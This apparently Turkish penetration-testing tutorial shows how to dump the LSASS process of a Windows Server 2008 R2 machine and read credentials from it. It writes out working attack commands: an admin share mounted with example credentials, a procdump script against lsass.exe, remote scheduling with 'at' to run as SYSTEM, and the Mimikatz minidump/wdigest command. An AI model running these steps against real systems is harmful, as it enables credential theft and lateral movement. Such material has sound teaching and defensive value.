WCE ve Mimikatz araçları temel olarak RAM üzerinde bulunan kimlik doğrulama paketlerindeki (authentication packages) kimlik bilgilerini (şifreli parola ve parola özetlerini, kullanıcı adı gibi) okur, parolayı (ve MSV1_0.dll için parola özetini) şifreleyen şifreleme anahtarını elde eder. Sonrasında ise, şifreli kimlik bilgilerini çözer (deşifre eder). Bu yazıda, DCMakinesi adlı 64 bit mimarideki Windows Server 2008 R2 bilgisayarda yerel yönetici hakları ile disk sistemine erişim sağlanabildiği varsayılacaktır. Disk sistemi erişimi sağlandıktan sonra LSASS prosesinin dump dosyası ele geçirilirse, oturumu açık olan veya bir şekilde kimlik doğrulaması gerçekleştiren hesaplara (bu yazı için Administrator, Jale ve Zeynep) ait kimlik bilgileri elde edilebilir. Bu amaçla, öncelikle hedef sistemin diskine Windows Systernals aracı olan Procdump aracı indirilir. Bunun yanında bu aracı çalıştıracak olan bir betik hazırlanarak hedef sistemin diskine kaydedilir.
net use \\192.168.100.200\C$ /user:Ornek\Halit Hh123456
@echo off
C:\ProsesDizini\procdump.exe -accepteula -ma lsass.exe C:\ProsesDizini\LSASS_prosesi.dmp
Bu betik kullanılarak, Procdump aracı çalıştırılacak ve LSASS prosesinin dump hali elde edilecektir. Hedef sisteme komut satırı erişimi elde edilmiş olsaydı betik çalıştırılabilirdi. Bu yazıda, komut satırı erişimi olmadığı için, “at” aracı kullanılarak hedef sistemde zamanlanmış bir görev oluşturulacak ve betik çalıştırılacaktır. Mevcut durumda saatin 19:40 olduğu görülmektedir. Aşağıdaki ekran görüntüsünde 2 dakika sonrası için bir zamanlanmış görev oluşturulduğu ve zaman geldiğinde (19:42) betiğin çalışarak LSASS_prosesi.dmp dosyasını oluşturduğu görülmektedir.
net time \\192.168.100.200
at \\192.168.100.200 19:42 C:\ProsesDizini\Betik.bat
at \\192.168.100.200
net time \\192.168.100.200
net time \\192.168.100.200
at \\192.168.100.200
Not: “at” aracı “schtask” aracı gibi zamanlanmış görev oluşturmak için kullanılır. “schtask” aracı ile oluşturulmul bir görev, görevi oluşturan kullanıcı yetkileri ile çalışır. Bunun yanında “at” aracı ile oluşturulan görev ise, SYSTEM yetkisi ile çalışır ve bu komutu çalıştırmak için yerel yönetici yetkisine sahip olmak gereklidir.
Dump dosyası, aynı mimariye sahip (64 bit mimarideki Windows 7 veya Windows Server 2008 R2) bir bilgisayara taşınıp Mimikatz aracına parametre olarak verilirse, LSASS prosesinde kayıtlı olan kimlik bilgileri elde edilebilmektedir.
mimikatz.exe “sekurlsa::minidump LSASS_prosesi.dmp” “sekurlsa::wdigest” exit
Komut çıktısının devamında kimlik bilgilerinin olduğu görülmektedir.